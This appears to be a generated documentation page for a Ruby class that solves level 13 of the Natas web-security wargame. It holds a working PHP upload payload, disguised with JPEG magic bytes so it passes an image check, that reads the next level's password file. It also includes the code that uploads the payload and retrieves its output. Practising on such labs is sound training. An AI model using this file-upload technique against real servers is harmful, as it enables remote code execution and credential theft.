Class: NatasLevel13

Inherits:
NatasLevelBase show all
Defined in:
lib/natas.rb

Overview

Level 13

Constant Summary collapse

LEVEL = 
13
PAGE = 
'/'
PAYLOAD = 
%(\xff\xd8\xff<? echo(file_get_contents('#{WEBPASS}/natas14')); ?>)

Constants inherited from NatasLevelBase

NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS

Instance Attribute Summary

Attributes inherited from NatasLevelBase

#login, #password

Instance Method Summary collapse

Methods inherited from NatasLevelBase

#get, #initialize, #level, #post

Constructor Details

This class inherits a constructor from NatasLevelBase

Instance Method Details

#execObject 



428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
 
# File 'lib/natas.rb', line 428

def exec
  data = [
    ['filename', 'file.php'],
    ['uploadedfile', PAYLOAD, { filename: 'uploadedfile' }]
  ]
  log('Uploading file')
  data = post(PAGE, {}, data, multipart: true).body
  match = %r{The file <a href="(upload/\w+.php)">}.match(data)
  not_found unless match
  file = "/#{match[1]}"
  log("Getting file #{file}")
  data = get(file).body
  match = /(\w{32})/.match(data)
  not_found unless match
  found(match[1])
end